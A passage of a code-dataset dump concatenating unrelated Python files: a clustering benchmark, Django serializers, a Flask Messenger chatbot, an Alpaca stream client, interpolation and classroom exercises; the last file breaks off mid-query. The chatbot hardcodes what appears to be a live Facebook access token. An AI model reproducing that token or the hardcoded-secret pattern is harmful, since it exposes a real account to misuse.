np.array([r1, 1])\r\n for i in range(nb_trials):\r\n # Prince init\r\n prince_init = dim_reduce_init(y, n_clusters, k, r, nj, var_distrib, seed = None)\r\n m, pred = misc(labels_oh, prince_init['classes'], True) \r\n cm = confusion_matrix(labels_oh, pred)\r\n purity = cluster_purity(cm)\r\n \r\n micro = precision_score(labels_oh, pred, average = 'micro')\r\n macro = precision_score(labels_oh, pred, average = 'macro')\r\n #print(micro)\r\n #print(macro)\r\n \r\n mca_res = mca_res.append({'it_id': i + 1, 'r': str(r), 'micro': micro, 'macro': macro, \\\r\n 'purity': purity}, ignore_index=True)\r\n \r\n\r\nmca_res.groupby('r').mean()\r\nmca_res.groupby('r').std()\r\n\r\nmca_res.to_csv(res_folder + '/mca_res.csv')\r\n\r\n\r\n# MDGMM. Thresholds use: 0.25 and 0.10\r\n# r = [2, 1]\r\n# k = [2, 1]\r\n\r\n# Small hack to remove\r\ndtype['Pregnancies'] = np.str\r\ny = y.astype(dtype, copy=True)\r\n\r\n\r\nr = np.array([5, 4, 3])\r\nnumobs = len(y)\r\nk = [4, n_clusters]\r\neps = 1E-05\r\nit = 2\r\nmaxstep = 100\r\n\r\nprince_init = dim_reduce_init(y, n_clusters, k, r, nj, var_distrib, seed = None, use_famd = True)\r\nout = M1DGMM(y_np, n_clusters, r, k, prince_init, var_distrib, nj, it, eps, maxstep, seed = None)\r\n\r\nit = 30\r\n\r\nr = out['best_r']\r\nnumobs = len(y)\r\nk = out['best_k']\r\neps = 1E-05\r\nit = 30\r\nmaxstep = 100\r\n\r\nnb_trials= 30\r\nm1dgmm_res = pd.DataFrame(columns = ['it_id', 'micro', 'macro', 'silhouette'])\r\n\r\nfor i in range(nb_trials):\r\n\r\n print(i)\r\n # Prince init\r\n prince_init = dim_reduce_init(y, n_clusters, k, r, nj, var_distrib,\\\r\n seed = None, use_famd = True)\r\n\r\n try:\r\n out = M1DGMM(y_np, n_clusters, r, k, prince_init, var_distrib, nj, it,\\\r\n eps, maxstep, seed = None, perform_selec = False)\r\n m, pred = misc(labels_oh, out['classes'], True) \r\n\r\n sil = silhouette_score(dm, pred, metric = 'precomputed')\r\n micro = precision_score(labels_oh, pred, average = 'micro')\r\n macro = precision_score(labels_oh, pred, average = 'macro')\r\n print(micro)\r\n print(macro)\r\n\r\n m1dgmm_res = m1dgmm_res.append({'it_id': i + 1, 'micro': micro, 'macro': macro, \\\r\n 'silhouette': sil}, ignore_index=True)\r\n except ValueError:\r\n m1dgmm_res = m1dgmm_res.append({'it_id': i + 1, 'micro': np.nan, 'macro': np.nan, \\\r\n 'silhouette': np.nan}, ignore_index=True)\r\n\r\n\r\n\r\nm1dgmm_res.mean()\r\nm1dgmm_res.std()\r\n\r\nm1dgmm_res.to_csv(res_folder + '/m1dgmm_res_famd.csv')\r\n","sub_path":"M1DGMM/test_on_pima.py","file_name":"test_on_pima.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"576825270","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib\nimport numpy as np\nimport librosa\n\n# 设置中文字体和负号正常显示\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\nmatplotlib.rcParams['axes.unicode_minus'] = False\n\ntrain = pd.read_csv('evaluation_setup/meta.csv', sep='\\t')\nprint(train.head()) # 输出数据头几行\nprint(\"Number of training examples=\", train.shape[0], \" Number of classes=\",\n len(train.scene_label.unique())) ## unique()方法快速得到类别集合\n# category_group = train.groupby(['scene_label'], axis=0).count() ## group_by 根据scene_label,沿着行分组,并计算出每个组的数量(快速按类別分組)\n# print(category_group)\n# groups = train.groupby(['scene_label'], axis=0, sort=True).groups ## groups屬性得到每組的元素index集合\n# print(groups['airport'])\n\nprint(train.scene_label.value_counts()) # 单独分组计数\n\n### 2. 条形图显示每个类别的数目\n# value_counts = train.scene_label.value_counts() # series\n# print(value_counts.values) # index拿到类别数组 values 拿到值数组\n# plt.plot(value_counts.values, color='red')\n# x = np.arange(10)\n# plt.bar(left=x, height=value_counts.values, width=0.4, alpha=0.8, color='red', label=\"类别\")\n# plt.xticks(x, list(value_counts.index), rotation=90) # 给x轴上的每个位置加标记,并且标记旋转90度\n# plt.title('category_statistics')\n# plt.legend()\n# plt.show()\n\n### 3. apply() 类似python map函数的作用\ntrain['b'] = np.arange(8640)\ntrain['a'] = train['b'].apply(lambda f: f + 2)\nprint(train['a'])\n\n### 4.plot 音频\ny,sr=librosa.load('airport-barcelona-0-0-a.wav',sr=48000)\nplt.figure()\nprint(sr*10)\nplt.plot(y,'-')\nplt.show()","sub_path":"src/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"532708423","text":"from django.db import transaction\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import APIException\n\nfrom goods.models import SKUImage, SKU, SKUSpecification, GoodsCategory, SPU, SpecificationOption\nfrom meiduo_mall.utils.fastdfs.fdfs_storage import FastDFSStorage\n\n\n# sku_image = SKUImage.objects.get(id=1)\n# sku_image.sku\nclass SKUImageSerializer(serializers.ModelSerializer):\n \"\"\"SKU图片序列化器类\"\"\"\n sku_id = serializers.IntegerField(label='SKU商品id')\n\n # 关联对象嵌套序列化\n sku = serializers.StringRelatedField(label='SKU商品名称')\n\n class Meta:\n model = SKUImage\n exclude = ('create_time', 'update_time')\n\n def validate_sku_id(self, value):\n # sku_id对应的sku商品是否存在\n try:\n sku = SKU.objects.get(id=value)\n except SKU.DoesNotExist:\n raise serializers.ValidationError('SKU商品不存在')\n\n # return value\n # 注意:返回的是查到sku对象,之后在validated_data中\n # 获取的sku_id就是这里返回sku对象\n return sku\n\n # ModelSerializer->update\n def update(self, instance, validated_data):\n # 获取上传文件对象\n file = validated_data['image']\n\n # 获取sku对象\n sku = validated_data['sku_id']\n\n # 上传图片到fdfs系统\n fdfs = FastDFSStorage()\n try:\n file_id = fdfs.save(file.name, file)\n except Exception:\n # 上传文件失败\n raise APIException('上传文件失败')\n\n # 修改SKU图片数据\n instance.sku = sku\n instance.image = file_id\n instance.save()\n\n return instance\n\n # ModelSerializer->create->SKUImage.objects.create()\n def create(self, validated_data):\n # 获取上传文件对象\n file = validated_data['image']\n\n # 获取sku对象\n sku = validated_data['sku_id']\n\n # 上传图片到fdfs系统\n fdfs = FastDFSStorage()\n try:\n file_id = fdfs.save(file.name, file)\n except Exception:\n # 上传文件失败\n raise APIException('上传文件失败')\n\n # 保存上传图片记录\n sku_image = SKUImage.objects.create(\n sku=sku,\n # sku_id=sku.id,\n image=file_id\n )\n\n # sku商品的默认图片设置\n if not sku.default_image:\n sku.default_image = sku_image.image.url\n sku.save()\n\n return sku_image\n\n\nclass SKUSimpleSerializer(serializers.ModelSerializer):\n \"\"\"SKU商品序列化器类\"\"\"\n class Meta:\n model = SKU\n fields = ('id', 'name')\n\n\nclass SKUSpecSerializer(serializers.ModelSerializer):\n \"\"\"SKU规格选项序列化器类\"\"\"\n spec_id = serializers.IntegerField(label='规格id')\n option_id = serializers.IntegerField(label='选项id')\n\n class Meta:\n model = SKUSpecification\n fields = ('spec_id', 'option_id')\n # read_only\n\n\n# sku = SKU.objects.get(id=1)\n# sku.spu -> 获取和sku关联的spu数据\n# sku.category -> 获取和sku关联的第三级分类数据\n# sku.specs -> 获取和sku关联的规格选项数据\nclass SKUSerializer(serializers.ModelSerializer):\n \"\"\"SKU商品序列化器类\"\"\"\n # 关联对象嵌套序列化\n spu = serializers.StringRelatedField(label='SPU名称')\n category = serializers.StringRelatedField(label='第三级分类')\n\n spu_id = serializers.IntegerField(label='SPU ID')\n category_id = serializers.IntegerField(label='第三级分类id')\n\n # 关联对象嵌套序列化:使用指定的序列化器将关联对象进行序列化\n specs = SKUSpecSerializer(label='SKU规格选项数据', many=True)\n\n class Meta:\n model = SKU\n exclude = ('default_image', 'create_time', 'update_time')\n\n def validate(self, attrs):\n # 获取category_id\n category_id = attrs['category_id']\n\n try:\n category = GoodsCategory.objects.get(id=category_id, subs=None)\n except GoodsCategory.DoesNotExist:\n raise serializers.ValidationError('第三级分类不存在')\n\n # 获取spu_id\n spu_id = attrs['spu_id']\n\n try:\n spu = SPU.objects.get(id=spu_id)\n except SPU.DoesNotExist:\n raise serializers.ValidationError('SPU不存在')\n\n # 检验category_id和spu的category3_id是否一致\n if category_id != spu.category3_id:\n raise serializers.ValidationError('第三级分类数据有误')\n\n # 检验spu的规格数据是否完整\n spu_specs = spu.specs.all() # 获取和spu关联的规格数据\n spu_specs_count = spu_specs.count()\n\n specs = attrs['specs']\n\n if spu_specs_count != len(specs):\n raise serializers.ValidationError('SKU规格数据不完整')\n\n # 检验spu的规格数据和传递的规格数据是否一致\n spu_specs_ids = [spec.id for spec in spu_specs] # [11, 12, 13]\n specs_ids = [spec.get('spec_id') for spec in specs] # [11, 13, 12]\n spu_specs_ids.sort()\n specs_ids.sort()\n if spu_specs_ids != specs_ids:\n raise serializers.ValidationError('SKU规格数据有误')\n\n # 检验传递的每个规格的选项在spu对应的规格下是否存在\n for spec in specs:\n # 获取spec_id, option_id\n spec_id = spec.get('spec_id')\n option_id = spec.get('option_id') # 3\n\n # 获取spec_id对应规格下面选项\n options = SpecificationOption.objects.filter(spec_id=spec_id)\n options_ids = [option.id for option in options] # [1, 2, 3]\n\n if option_id not in options_ids:\n raise serializers.ValidationError('规格选项数据有误')\n\n return attrs\n\n # ModelSerializer->create->SKU.objects.create()\n def create(self, validated_data):\n specs = validated_data.pop('specs')\n\n with transaction.atomic():\n # with语句块下的代码,凡是涉及到数据库操作的,都会放在同一个事务中\n # 添加sku商品的数据\n sku = super().create(validated_data)\n\n # 添加sku商品规格选项数据\n for spec in specs:\n # 获取spec_id和option_id\n spec_id = spec.get('spec_id')\n option_id = spec.get('option_id')\n\n SKUSpecification.objects.create(\n sku=sku,\n spec_id=spec_id,\n option_id=option_id\n )\n\n return sku\n\n def update(self, instance, validated_data):\n \"\"\"\n instance: sku商品对象\n \"\"\"\n specs = validated_data.pop('specs')\n\n with transaction.atomic():\n # 更新sku商品的数据\n super().update(instance, validated_data)\n\n # 更新sku商品的规格选项数据\n sku_specs = instance.specs.all()\n\n sku_specs_li = [{\n 'spec_id': spec.spec_id,\n 'option_id': spec.option_id\n }\n for spec in sku_specs]\n\n if specs != sku_specs_li:\n # 删除sku原有的规格选项数据\n sku_specs.delete()\n\n # 添加sku商品规格选项数据\n for spec in specs:\n # 获取spec_id和option_id\n spec_id = spec.get('spec_id')\n option_id = spec.get('option_id')\n\n SKUSpecification.objects.create(\n sku=instance,\n spec_id=spec_id,\n option_id=option_id\n )\n\n return instance\n\n\n\n\n\n\n\n\nclass SKUCategorySerializer(serializers.ModelSerializer):\n \"\"\"分类序列化器类\"\"\"\n class Meta:\n model = GoodsCategory\n fields = ('id', 'name')\n\n","sub_path":"meiduo_mall/meiduo_mall/apps/meiduo_admin/serializers/skus.py","file_name":"skus.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"396951965","text":"#https://hackernoon.com/beginners-guide-simple-chat-bot-fb-based-on-flask-and-heroku-2g7v32ab\nimport random\nfrom flask import Flask, request\nfrom pymessenger.bot import Bot\n\n#from tensorflow import keras\nfrom keras.models import load_model, Model\nfrom keras.layers import Input, LSTM, Dense\nfrom keras.models import model_from_json\nimport re\nimport numpy as np\n\napp = Flask(__name__) # Initializing our Flask application\nACCESS_TOKEN = 'EABFdZAPLvVmIBAGkF62UZAtDRDlcicSvSvkqGYap8aynfCdmtg5F7mfimBFHaKlwMA8SBOwemeRlcnlvaW8W9AIa6JsDu6fylppTo16J5fXuDDuiJZCueiYEOCBpAs1m3Hy0PxwJdzm7oLZBeUmbq6yu0KK8BZBsegDJCjunaNwZDZD'\nVERIFY_TOKEN = 'EABFdZAPLvVmIBAGkF62UZAtDRDlcicSvSvkqGYap8aynfCdmtg5F7mfimBFHaKlwMA8SBOwemeRlcnlvaW8W9AIa6JsDu6fylppTo16J5fXuDDuiJZCueiYEOCBpAs1m3Hy0PxwJdzm7oLZBeUmbq6yu0KK8BZBsegDJCjunaNwZDZDAS'\nbot = Bot(ACCESS_TOKEN)\n\ndef load_full_model(training_model):\n \n data_path = \"preguntas7.txt\"\n data_path2 = \"respuestas7.txt\"\n with open(data_path.encode('utf-8'), 'r') as f:\n lines = f.read().split('\\n')\n with open(data_path2.encode('utf-8'), 'r') as f:\n lines2 = f.read().split('\\n')\n lines = [re.sub(r\"\\[\\w+\\]\",'hi',line) for line in lines]\n lines = [\" \".join(re.findall(r\"\\w+\",line)) for line in lines]\n lines2 = [re.sub(r\"\\[\\w+\\]\",'',line) for line in lines2]\n lines2 = [\" \".join(re.findall(r\"\\w+\",line)) for line in lines2]\n # Grouping lines by response pair\n pairs = list(zip(lines,lines2))\n #random.shuffle(pairs)\n\n input_docs = []\n target_docs = []\n input_tokens = set()\n target_tokens = set()\n for line in pairs[:]:\n input_doc, target_doc = line[0], line[1]\n # Appending each input sentence to input_docs\n input_docs.append(input_doc)\n # Splitting words from punctuation \n target_doc = \" \".join(re.findall(r\"[\\w']+|[^\\s\\w]\", target_doc))\n # Redefine target_doc below and append it to target_docs\n target_doc = ' ' + target_doc + ' '\n target_docs.append(target_doc)\n \n # Now we split up each sentence into words and add each unique word to our vocabulary set\n for token in re.findall(r\"[\\w']+|[^\\s\\w]\", input_doc):\n if token not in input_tokens:\n input_tokens.add(token)\n for token in target_doc.split():\n if token not in target_tokens:\n target_tokens.add(token)\n \n input_tokens = sorted(list(input_tokens))\n target_tokens = sorted(list(target_tokens))\n \n global num_encoder_tokens\n global num_decoder_tokens\n\n num_encoder_tokens = len(input_tokens)\n num_decoder_tokens = len(target_tokens)\n \n global input_features_dict\n global target_features_dict\n\n input_features_dict = dict(\n [(token, i) for i, token in enumerate(input_tokens)])\n target_features_dict = dict(\n [(token, i) for i, token in enumerate(target_tokens)])\n \n global reverse_input_features_dict\n global reverse_target_features_dict\n\n reverse_input_features_dict = dict(\n (i, token) for token, i in input_features_dict.items())\n reverse_target_features_dict = dict(\n (i, token) for token, i in target_features_dict.items())\n \n \n global max_decoder_seq_length\n global max_encoder_seq_length\n max_encoder_seq_length = max([len(re.findall(r\"[\\w']+|[^\\s\\w]\", input_doc)) for input_doc in input_docs])\n max_decoder_seq_length = max([len(re.findall(r\"[\\w']+|[^\\s\\w]\", target_doc)) for target_doc in target_docs])\n \n encoder_input_data = np.zeros(\n (len(input_docs), max_encoder_seq_length, num_encoder_tokens),\n dtype='float32')\n decoder_input_data = np.zeros(\n (len(input_docs), max_decoder_seq_length, num_decoder_tokens),\n dtype='float32')\n decoder_target_data = np.zeros(\n (len(input_docs), max_decoder_seq_length, num_decoder_tokens),\n dtype='float32')\n\n for line, (input_doc, target_doc) in enumerate(zip(input_docs, target_docs)):\n for timestep, token in enumerate(re.findall(r\"[\\w']+|[^\\s\\w]\", input_doc)):\n #Assign 1. for the current line, timestep, & word in encoder_input_data\n encoder_input_data[line, timestep, input_features_dict[token]] = 1.\n\n for timestep, token in enumerate(target_doc.split()):\n decoder_input_data[line, timestep, target_features_dict[token]] = 1.\n if timestep > 0:\n decoder_target_data[line, timestep - 1, target_features_dict[token]] = 1.\n \n dimensionality = 256\n\n #Encoder\n encoder_inputs = Input(shape=(None, num_encoder_tokens))\n encoder_lstm = LSTM(dimensionality, return_state=True)\n encoder_outputs, state_hidden, state_cell = encoder_lstm(encoder_inputs)\n encoder_states = [state_hidden, state_cell] \n \n #Decoder\n decoder_inputs = Input(shape=(None, num_decoder_tokens))\n decoder_lstm = LSTM(dimensionality, return_sequences=True, return_state=True)\n decoder_outputs, decoder_state_hidden, decoder_state_cell = decoder_lstm(decoder_inputs, initial_state=encoder_states)\n decoder_dense = Dense(num_decoder_tokens, activation='softmax')\n decoder_outputs = decoder_dense(decoder_outputs)\n \n #Load the model\n encoder_inputs = training_model.input[0]\n encoder_outputs, state_h_enc, state_c_enc = training_model.layers[2].output\n encoder_states = [state_h_enc, state_c_enc]\n\n global encoder_model\n\n encoder_model = Model(encoder_inputs, encoder_states)\n\n latent_dim = 256\n decoder_state_input_hidden = Input(shape=(latent_dim,))\n decoder_state_input_cell = Input(shape=(latent_dim,))\n decoder_states_inputs = [decoder_state_input_hidden, decoder_state_input_cell]\n decoder_outputs, state_hidden, state_cell = decoder_lstm(decoder_inputs, initial_state=decoder_states_inputs)\n decoder_states = [state_hidden, state_cell]\n decoder_outputs = decoder_dense(decoder_outputs)\n \n global decoder_model\n \n decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)\n \n#Method to convert user input into a matrix\ndef string_to_matrix(user_input):\n tokens = re.findall(r\"[\\w']+|[^\\s\\w]\", user_input)\n user_input_matrix = np.zeros(\n (1, 12, 356),\n dtype='float32')\n for timestep, token in enumerate(tokens):\n if token in input_features_dict:\n user_input_matrix[0, timestep, input_features_dict[token]] = 1.\n return user_input_matrix\n \n#Method that will create a response using seq2seq model we built\ndef generate_response(user_input):\n input_matrix = string_to_matrix(user_input)\n chatbot_response = decode_response(input_matrix)\n #Remove and tokens from chatbot_response\n chatbot_response = chatbot_response.replace(\"\",'')\n chatbot_response = chatbot_response.replace(\"\",'')\n return chatbot_response\n\n\n#KERAS MODEL\ndef decode_response(test_input):\n #Getting the output states to pass into the decoder\n states_value = encoder_model.predict(test_input)\n #Generating empty target sequence of length 1\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n #Setting the first token of target sequence with the start token\n target_seq[0, 0, target_features_dict['']] = 1.\n \n #A variable to store our response word by word\n decoded_sentence = ''\n \n stop_condition = False\n while not stop_condition:\n #Predicting output tokens with probabilities and states\n output_tokens, hidden_state, cell_state = decoder_model.predict([target_seq] + states_value)\n #Choosing the one with highest probability\n sampled_token_index = np.argmax(output_tokens[0, -1, :])\n sampled_token = reverse_target_features_dict[sampled_token_index]\n decoded_sentence += \" \" + sampled_token\n #Stop if hit max length or found the stop token\n if (sampled_token == '' or len(decoded_sentence) > max_decoder_seq_length):\n stop_condition = True\n #Update the target sequence\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n target_seq[0, 0, sampled_token_index] = 1.\n #Update states\n states_value = [hidden_state, cell_state]\n return decoded_sentence\n\n\n# Importing standard route and two requst types: GET and POST.\n# We will receive messages that Facebook sends our bot at this endpoint\n@app.route('/', methods=['GET', 'POST'])\ndef receive_message():\n if request.method == 'GET':\n # Before allowing people to message your bot Facebook has implemented a verify token\n # that confirms all requests that your bot receives came from Facebook.\n token_sent = request.args.get(\"hub.verify_token\")\n return verify_fb_token(token_sent)\n # If the request was not GET, it must be POSTand we can just proceed with sending a message\n # back to user\n else:\n # get whatever message a user sent the bot\n output = request.get_json()\n for event in output['entry']:\n messaging = event['messaging']\n for message in messaging:\n if message.get('message'):\n # Facebook Messenger ID for user so we know where to send response back to\n recipient_id = message['sender']['id']\n if message['message'].get('text'):\n response_sent_text = get_message()\n send_message(recipient_id, response_sent_text)\n # if user send us a GIF, photo, video or any other non-text item\n if message['message'].get('attachments'):\n response_sent_text = get_message()\n send_message(recipient_id, response_sent_text)\n return \"Message Processed\"\n\n\ndef verify_fb_token(token_sent):\n # take token sent by Facebook and verify it matches the verify token you sent\n # if they match, allow the request, else return an error\n if token_sent == VERIFY_TOKEN:\n return request.args.get(\"hub.challenge\")\n return 'Invalid verification token'\n\n\ndef get_message():\n sample_responses = [\"You are stunning!\", \"We're proud of you\",\n \"Keep on being you!\", \"We're greatful to know you :)\"]\n # return selected item to the user\n return random.choice(sample_responses)\n\n\n# Uses PyMessenger to send response to the user\ndef send_message(recipient_id, response):\n # sends user the text message provided via input response parameter\n bot.send_text_message(recipient_id, response)\n return \"success\"\n\n#load model #1\nchatbotmodel = load_model('training_model.h5')\nload_full_model(chatbotmodel)\n\n# Add description here about this if statement.\nif __name__ == \"__main__\":\n #load the model\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"310259115","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 2 20:37:37 2021\r\n\r\n@author: sundeep singh\r\n\r\n\"\"\"\r\n\r\n#imports\r\n\r\nimport asyncio\r\nimport sys\r\nimport pathlib\r\nimport sys\r\nimport os\r\nimport pathlib\r\nimport time\r\nsys.path.append(str(pathlib.Path(__file__).resolve().parents[3]))\r\nimport nest_asyncio\r\nimport app.config as Config\r\nfrom alpaca_trade_api.rest import REST\r\nfrom alpaca_trade_api.stream import Stream\r\nfrom alpaca_trade_api.common import URL\r\nimport logging\r\nimport logging.config\r\n\r\n#log's info\r\nlogging.config.fileConfig(Config.LOG_CONF_FILE,disable_existing_loggers=False)\r\nlogger=logging.getLogger(\"alpacastream\")\r\n\r\nclass AlpacaDataStream:\r\n \r\n def __init__(self):\r\n os.environ[\"APCA_API_KEY_ID\"]=Config.ALPACA_API_KEY\r\n os.environ[\"APCA_API_SECRET_KEY\"]=Config.ALPACA_SECRET_KEY\r\n os.environ[\"APCA_API_BASE_URL\"]=Config.ALPACA_API_URL\r\n self._conn=None\r\n\r\n\r\n #gets the market open time stamp\r\n def get_market_clock(self):\r\n\r\n try:\r\n obj=REST()\r\n clk=obj.get_clock()\r\n return clk\r\n\r\n except Exception as e:\r\n return ConnectionError\r\n\r\n\r\n \r\n \r\n # gets streams\r\n def get_streams(self,feed,channels,symbols,handlers):\r\n\r\n try:\r\n self._conn = Stream(data_feed=feed,raw_data=True)\r\n\r\n except Exception as e:\r\n\r\n logger.exception(\"some error in streaming \")\r\n\r\n \r\n\r\n \r\n \r\n \r\n if \"bars\" in channels:\r\n self._conn.subscribe_bars(handlers[\"bars\"],*symbols)\r\n \r\n\r\n \r\n \r\n if \"trades\" in channels:\r\n\r\n\r\n self._conn.subscribe_trade_updates(handlers[\"trades\"])\r\n self._conn.subscribe_trades(handlers[\"trades_update\"],*symbols)\r\n \r\n if \"quotes\" in channels:\r\n self._conn.subscribe_quotes(handlers[\"quotes\"],*symbols)\r\n \r\n \r\n \r\n \r\n try:\r\n\r\n logger.info(\"connecting to alpaca server\")\r\n res=self._conn.run()\r\n\r\n \r\n\r\n \r\n \r\n logger.info(\"connction to alpaca server terminated\")\r\n \r\n print(\"connection established with alpaca server\")\r\n \r\n except Exception as e:\r\n\r\n logger.exception(\"some error connecting to server check logs\")\r\n \r\n raise e\r\n\r\n finally:\r\n print(\"Trying to re-establish connection\")\r\n time.sleep(5)\r\n res=self._conn.run()\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n ","sub_path":"app/providers/Alpaca/AlpacaDataStream.py","file_name":"AlpacaDataStream.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"525806240","text":"class Solution:\n def getMines(self, board, row, column):\n # Time Complexity: O(mn)\n # Space Complexity: O(mn)\n dirs = [[0,1],[0,-1],[1,0],[-1,0],[1,1],[-1,-1],[1,-1],[-1,1]]\n o=0\n for i in dirs:\n r = row + i[0]\n c = column + i[1]\n if(r>=0 and r=0 and c List[List[str]]:\n if(board==None or len(board)==0):\n return board\n \n dirs = [[0,1],[0,-1],[1,0],[-1,0],[1,1],[-1,-1],[1,-1],[-1,1]]\n \n # base case\n \n if(board[click[0]][click[1]]==\"M\"):\n board[click[0]][click[1]]=\"X\"\n return board\n \n q = deque([])\n board[click[0]][click[1]]='B'\n q.append([click[0],click[1]])\n while(len(q)>0):\n curr = q.popleft()\n mines = self.getMines(board,curr[0],curr[1])\n if(mines==0):\n for dir in dirs:\n r = curr[0] + dir[0]\n c = curr[1] + dir[1]\n if(r>=0 and r=0 and c mảng ( tên folder trong folder trainning) [name1, name2, name3]\r\n label_lines = [line.rstrip() for line \r\n in tf.gfile.GFile(\"tf_files/retrained_labels.txt\")] \r\n\r\n\r\n \t\t\t\t \r\n # graph einlesen, wurde in train.sh -> call retrain.py trainiert\r\n with tf.gfile.FastGFile(\"tf_files/retrained_graph.pb\", 'rb') as f:\r\n \r\n graph_def = tf.GraphDef()\t## The graph-graph_def is a saved copy of a TensorFlow graph; objektinitialisierung\r\n graph_def.ParseFromString(f.read())\t#Parse serialized protocol buffer data into variable\r\n _ = tf.import_graph_def(graph_def, name='')\t# import a serialized TensorFlow GraphDef protocol buffer, extract objects in the GraphDef as tf.Tensor\r\n \t\r\n \t#https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/inception.py ; ab zeile 276\r\n\r\n with tf.Session() as sess:\r\n\r\n softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')\r\n \t# return: Tensor(\"final_result:0\", shape=(?, 4), dtype=float32); stringname definiert in retrain.py, zeile 1064 \r\n \r\n predictions = sess.run(softmax_tensor, \\\r\n {'DecodeJpeg/contents:0': image_data})\r\n #print(predictions) # [[0.0083019 0.0825651 0.90913296]]\r\n # gibt prediction values in array zuerueck:\r\n \t\r\n top_k = predictions[0].argsort()[-len(predictions[0]):][::-1]\r\n \t# sortierung; circle -> 0, plus -> 1, square -> 2, triangle -> 3; array return bsp [3 1 2 0] -> sortiert nach groesster uebereinstimmmung\r\n\r\n \t# output\r\n\r\n for node_id in top_k:\r\n human_string = label_lines[node_id]\r\n score = predictions[0][node_id]\r\n \r\n if( score > 0.7):\r\n print(image_path+\"FUCKING THE FACE OUT !!!!\")\r\n print('%s (score = %.5f)' % (human_string, score))\r\n break","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"555261930","text":"import sympy\nfrom math import log2\nimport matplotlib.pyplot as plt\nfrom sympy import diff, symbols\nfrom sympy.solvers import solve\nfrom sympy.parsing.sympy_parser import parse_expr\nimport numpy as np\n\nn = [1, 2, 5, 10, 20, 100]\n\n\ndef f(x):\n return log2(3 + x)\n\n\ndef fact(n):\n res = 1\n\n for i in range(2, n + 1):\n res *= i\n\n return res\n\n\ndef Qnk(k, x, nodes):\n res = 1\n\n for i in range(len(nodes)):\n if i == k:\n continue\n\n res *= (x - nodes[i]) / (nodes[k] - nodes[i])\n\n return res\n\n\ndef Pn(x, nodes):\n res = 0\n\n for k in range(len(nodes)):\n res += f(nodes[k]) * Qnk(k, x, nodes)\n\n return res\n\n\ndef U(x, nodes):\n res = 1\n\n for i in range(len(nodes)):\n res *= (x - nodes[i])\n\n return res\n\n\ndef main(points, nodes):\n for i in range(len(nodes)):\n y = [Pn(p, nodes[i]) for p in points]\n plt.plot(points, y, label='n = {}'.format(n[i]))\n plt.xlabel(\"x\")\n plt.ylabel(\"Pn(x)\")\n plt.title(\"Polinom\")\n plt.legend()\n plt.show()\n\n\ndef errors(points, nodes):\n x = symbols('x')\n f = parse_expr(\"log2(3 + x)\", local_dict={\"log2\": lambda x: sympy.log(x, 2)})\n for i in range(len(nodes)):\n d = diff(f, x, n[i] + 1)\n y = [(d.subs(x, p) * U(p, nodes[i])) / fact(n[i] + 1) for p in points]\n plt.plot(points, y, label='n = {}'.format(n[i]))\n plt.title(\"Errors\")\n plt.legend()\n plt.show()\n\n\ndef analitically(n, a, b, nodes):\n x = symbols('x')\n f = parse_expr(\"log2(3 + x)\", local_dict={\"log2\": lambda x: sympy.log(x, 2)})\n f = diff(f, x, n + 1)\n\n critical_points = solve(diff(f, x), x)\n critical_points.extend([a, b])\n\n M_max = max(map(lambda val: abs(f.subs(x, val)), critical_points))\n U = 1\n\n for i in range(len(nodes)):\n U *= (x - nodes[i])\n\n critical_points = solve(diff(U, x), x)\n critical_points.extend([a, b])\n\n U_max = max(map(lambda val: abs(U.subs(x, val)), critical_points))\n alpha = (M_max * U_max) / fact(n + 1)\n return alpha\n\n\nif __name__ == '__main__':\n a, b = -1, 1\n h = [(b - a) / n[i] for i in range(len(n))]\n points = np.linspace(a, b, num=10)\n nodes = []\n\n for i in range(len(n)):\n row = [a]\n for j in range(1, n[i] + 1):\n row.append(row[j - 1] + h[i])\n nodes.append(row)\n\n main(points, nodes)\n errors(points, nodes)\n print(analitically(n[3], a, b, nodes[3]))\n","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"392033180","text":"fname = input(\"Enter file:\")\r\nif len(fname) < 1 : fname = \"mbox-short.txt\"\r\nfh=open(fname)\r\ndict=dict()\r\nfor line in fh:\r\n line=line.rstrip()\r\n if line.startswith(\"From \") :\r\n wds=line.split()\r\n #print(wds)\r\n t=wds[5]\r\n #print(t)\r\n hrs=t[:2]\r\n #print(hrs)\r\n dict[hrs]=dict.get(hrs,0)+1\r\n#for k,v in sorted (dict.items()) :\r\n #print(k,v)\r\n","sub_path":"files_5/files_5.py","file_name":"files_5.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"210734538","text":"import sqlite3\nimport time\nfrom setup import *\nfrom saleInfo import *\n\ndef list_product(cursor, connection, email):\n # This function executes a query that gets all the products associated to active sales! -> Then provides further instructions to the user for actions that they can perform\n\n \n\n listProduct_query = ''' SELECT distinct p.pid, p.descr, COUNT(pr.rtext), AVG(pr.rating), COUNT(distinct s.sid)\n FROM products p inner join sales s on s.pid = p.pid and s.edate > DATE('now') \n 